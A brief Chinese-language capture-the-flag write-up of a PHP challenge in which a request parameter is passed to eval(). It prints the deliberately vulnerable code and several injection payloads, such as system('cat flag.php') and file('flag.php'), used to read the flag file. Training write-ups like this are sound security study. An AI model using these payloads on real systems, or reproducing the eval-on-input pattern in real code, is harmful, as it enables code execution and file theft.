<?php include "flag.php"; $a = @$_REQUEST[‘hello‘]; eval( "var_dump($a);"); show_source(__FILE__); ?>
Too Young Too Simple
分析题,flag在一个php文件中
@$_REQUEST 与$_GET、$_POST 用途差不多,前者是后两者的结合
给hello一个值会用eavl进行函数执行
刚开始想法很简单
index.php?hello=system(‘cat flag.php‘)
相当于一句话,
然后并没出来,怀疑自我,
参考了别人的,在源代码里找到了flag。。。
其它比较有意思的几种写法
var_dump()函数可以打印
index.php?hello=file(‘flag.php‘)
index.php?hello=system(‘tac flag.php‘) //cat 倒过来也可以,不明白。。
原文:https://www.cnblogs.com/yunhai666/p/14783307.html